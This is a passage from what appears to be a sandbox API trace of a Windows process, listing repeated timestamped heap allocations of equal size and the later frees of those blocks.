Flags=0x0, Size=0x13200) returned 0x22f1bd0 [0102.776] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2304de0 [0102.776] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2317ff0 [0103.043] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x232b200 [0103.043] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x233e410 [0103.044] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2351620 [0103.044] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2364830 [0103.044] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2377a40 [0103.045] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x238ac50 [0103.045] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x239de60 [0103.046] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x23b1070 [0103.046] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x23c4280 [0103.046] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x23d7490 [0103.047] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x23ea6a0 [0103.047] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x23fd8b0 [0103.048] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2410ac0 [0103.048] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2423cd0 [0103.049] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2436ee0 [0103.049] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x244a0f0 [0103.050] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x245d300 [0103.050] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2470510 [0103.050] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2483720 [0103.051] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2496930 [0103.051] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x24a9b40 [0103.051] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x24bcd50 [0103.052] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x24cff60 [0103.052] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x24e3170 [0103.053] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x468) returned 0x48c5c0 [0103.053] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x478ae0 | out: hHeap=0x460000) returned 1 [0103.053] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x24f6380 [0103.053] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2509590 [0103.053] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x251c7a0 [0103.054] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x252f9b0 [0103.054] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2542bc0 [0103.055] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2560080 [0103.056] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2573290 [0103.056] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x25864a0 [0103.056] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x25996b0 [0103.057] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x25ac8c0 [0103.057] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x25bfad0 [0103.058] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x25d2ce0 [0103.058] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x25e5ef0 [0103.059] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x25f9100 [0103.059] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x260c310 [0103.059] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x261f520 [0103.060] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2632730 [0103.060] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2645940 [0103.061] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2658b50 [0103.061] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x266bd60 [0103.061] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x267ef70 [0103.062] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2692180 [0103.062] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x26a5390 [0103.063] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x26b85a0 [0103.063] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x26cb7b0 [0103.063] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x26de9c0 [0103.064] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x26f1bd0 [0103.064] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2704de0 [0103.064] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2717ff0 [0103.065] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x272b200 [0103.065] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x273e410 [0103.067] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2751620 [0103.067] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2764830 [0103.068] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2777a40 [0103.068] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x278ac50 [0103.069] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x279de60 [0103.069] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x27b1070 [0103.070] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x27c4280 [0103.070] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x27d7490 [0103.070] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x27ea6a0 [0103.071] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x27fd8b0 [0103.071] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2810ac0 [0103.072] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2823cd0 [0103.072] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2836ee0 [0103.073] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x284a0f0 [0103.073] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x285d300 [0103.074] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2870510 [0103.074] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x698) returned 0x4788e0 [0103.074] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x48c5c0 | out: hHeap=0x460000) returned 1 [0103.074] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2883720 [0103.074] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2896930 [0103.075] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x28a9b40 [0103.075] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x28bcd50 [0103.075] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x28cff60 [0103.076] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x28e3170 [0103.076] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x28f6380 [0103.077] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2909590 [0103.077] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x291c7a0 [0103.433] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x292f9b0 [0103.433] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2942bc0 [0103.434] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2955dd0 [0103.434] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2968fe0 [0103.434] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x297c1f0 [0103.435] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x298f400 [0103.435] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x29a2610 [0103.436] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x29b5820 [0103.436] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x29c8a30 [0103.436] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x29dbc40 [0103.437] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x29eee50 [0103.438] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2a02060 [0103.438] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2a15270 [0103.438] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2a28480 [0103.439] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2a3b690 [0103.439] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2a4e8a0 [0103.439] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2a61ab0 [0103.440] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2a74cc0 [0103.440] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2a87ed0 [0103.440] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2a9b0e0 [0103.440] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2aae2f0 [0103.441] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2ac1500 [0103.441] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2ad4710 [0103.441] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2ae7920 [0103.442] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2afab30 [0103.442] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2b0dd40 [0103.442] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2b20f50 [0103.443] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2b34160 [0103.443] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2b47370 [0103.443] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2b5a580 [0103.444] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2b6d790 [0103.444] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2b809a0 [0103.444] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2b93bb0 [0103.445] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2ba6dc0 [0103.445] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2bb9fd0 [0103.445] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2bcd1e0 [0103.446] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2be03f0 [0103.446] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2bf3600 [0103.446] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2c06810 [0103.447] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2c19a20 [0103.447] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2c2cc30 [0103.447] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2c3fe40 [0103.448] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2c53050 [0103.448] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2c66260 [0103.448] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2c79470 [0103.449] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2c8c680 [0103.449] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2c9f890 [0103.449] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2cb2aa0 [0103.450] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2cc5cb0 [0103.450] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2cd8ec0 [0103.450] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2cec0d0 [0103.451] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2cff2e0 [0103.451] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2d124f0 [0103.451] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2d25700 [0103.452] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2d38910 [0103.452] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2d60080 [0103.453] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2d73290 [0103.453] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2d864a0 [0103.454] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2d996b0 [0103.454] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2dac8c0 [0103.454] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2dbfad0 [0103.455] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x9e0) returned 0x48c5c0 [0103.455] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0103.455] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2dd2ce0 [0103.455] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2de5ef0 [0103.456] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2df9100 [0103.456] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2e0c310 [0103.457] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2e1f520 [0103.457] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2e32730 [0103.457] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2e45940 [0103.458] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2e58b50 [0103.458] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2e6bd60 [0103.458] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2e7ef70 [0103.459] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2e92180 [0103.459] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2ea5390 [0103.459] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2eb85a0 [0103.460] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2ecb7b0 [0103.460] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2ede9c0 [0103.669] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x48c5c0 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x497450 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4b7250 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ca460 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4dd670 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4f0880 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x503a90 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x516ca0 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x529eb0 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x53d0c0 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1e40080 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1e53290 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1e664a0 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1e796b0 | out: hHeap=0x460000) returned 1 [0111.013] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1e8c8c0 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1e9fad0 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1eb2ce0 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1ec5ef0 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1ed9100 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1eec310 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1eff520 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1f12730 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1f60080 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1f73290 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1f864a0 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1f996b0 | out: hHeap=0x460000) returned 1 [0111.014] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1fac8c0 | out: hHeap=0x460000) returned 1 [0111.236] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1fbfad0 | out: hHeap=0x460000) returned 1 [0111.237] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1fd2ce0 | out: hHeap=0x460000) returned 1 [0111.237] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1fe5ef0 | out: hHeap=0x460000) returned 1 [0111.237] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x1ff9100 | out: hHeap=0x460000) returned 1 [0111.237] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x200c310 | out: hHeap=0x460000) returned 1 [0111.237] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x201f520 | out: hHeap=0x460000) returned 1 [0111.237] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2032730 | out: hHeap=0x460000) returned 1 [0111.237] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2045940 | out: hHeap=0x460000) returned 1 [0111.237] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2058b50 | out: hHeap=0x460000) returned 1 [0111.242] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x206bd60 | out: hHeap=0x460000) returned 1 [0111.242] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x207ef70 | out: hHeap=0x460000) returned 1 [0111.242] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2092180 | out: hHeap=0x460000) returned 1 [0111.242] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x20a5390 | out: hHeap=0x460000) returned 1 [0111.242] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x20b85a0 | out: hHeap=0x460000) returned 1 [0111.242] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x20cb7b0 | out: hHeap=0x460000) returned 1 [0111.242] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x20de9c0 | out: hHeap=0x460000) returned 1 [0111.243] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x20f1bd0 | out: hHeap=0x460000) returned 1 [0111.243] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2104de0 | out: hHeap=0x460000) returned 1 [0111.243] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2117ff0 | out: hHeap=0x460000) returned 1 [0111.243] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x212b200 | out: hHeap=0x460000) returned 1 [0111.243] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x213e410 | out: hHeap=0x460000) returned 1 [0111.243] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2160080 | out: hHeap=0x460000) returned 1 [0111.243] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2173290 | out: hHeap=0x460000) returned 1 [0111.249] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x21864a0 | out: hHeap=0x460000) returned 1 [0111.250] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x21996b0 | out: hHeap=0x460000) returned 1 [0111.250] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x21ac8c0 | out: hHeap=0x460000) returned 1 [0111.250] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x21bfad0 | out: hHeap=0x460000) returned 1 [0111.250] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x21d2ce0 | out: hHeap=0x460000) returned 1 [0111.250] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x21e5ef0 | out: hHeap=0x460000) returned 1 [0111.250] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x21f9100 | out: hHeap=0x460000) returned 1 [0111.250] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x220c310 | out: hHeap=0x460000) returned 1 [0111.250] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x221f520 | out: hHeap=0x460000) returned 1 [0111.250] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2232730 | out: hHeap=0x460000) returned 1 [0111.250] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2245940 | out: hHeap=0x460000) returned 1 [0111.250] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2258b50 | out: hHeap=0x460000) returned 1 [0111.256] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x226bd60 | out: hHeap=0x460000) returned 1 [0111.256] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x227ef70 | out: hHeap=0x460000) returned 1 [0111.256] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2292180 | out: hHeap=0x460000) returned 1 [0111.256] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x22a5390 | out: hHeap=0x460000) returned 1 [0111.256] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x22b85a0 | out: hHeap=0x460000) returned 1 [0111.256] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x22cb7b0 | out: hHeap=0x460000) returned 1 [0111.256] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x22de9c0 | out: hHeap=0x460000) returned 1 [0111.256] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x22f1bd0 | out: hHeap=0x460000) returned 1 [0111.256] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2304de0 | out: hHeap=0x460000) returned 1 [0111.256] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2317ff0 | out: hHeap=0x460000) returned 1 [0111.260] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x232b200 | out: hHeap=0x460000) returned 1 [0111.263] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x233e410 | out: hHeap=0x460000) returned 1 [0111.263] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2351620 | out: hHeap=0x460000) returned 1 [0111.263] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2364830 | out: hHeap=0x460000) returned 1 [0111.266] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2377a40 | out: hHeap=0x460000) returned 1 [0111.266] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x238ac50 | out: hHeap=0x460000) returned 1 [0111.266] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x239de60 | out: hHeap=0x460000) returned 1 [0111.267] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x23b1070 | out: hHeap=0x460000) returned 1 [0111.267] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x23c4280 | out: hHeap=0x460000) returned 1 [0111.267] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x23d7490 | out: hHeap=0x460000) returned 1 [0111.267] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x23ea6a0 | out: hHeap=0x460000) returned 1 [0111.267] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x23fd8b0 | out: hHeap=0x460000) returned 1 [0111.267] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2410ac0 | out: hHeap=0x460000) returned 1 [0111.267] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2423cd0 | out: hHeap=0x460000) returned 1 [0111.267] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2436ee0 | out: hHeap=0x460000) returned 1 [0111.267] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x244a0f0 | out: hHeap=0x460000) returned 1 [0111.267] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x245d300 | out: hHeap=0x460000) returned 1 [0111.267] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2470510 | out: hHeap=0x460000) returned 1 [0111.484] HeapFree (in: hHeap=0x460000, 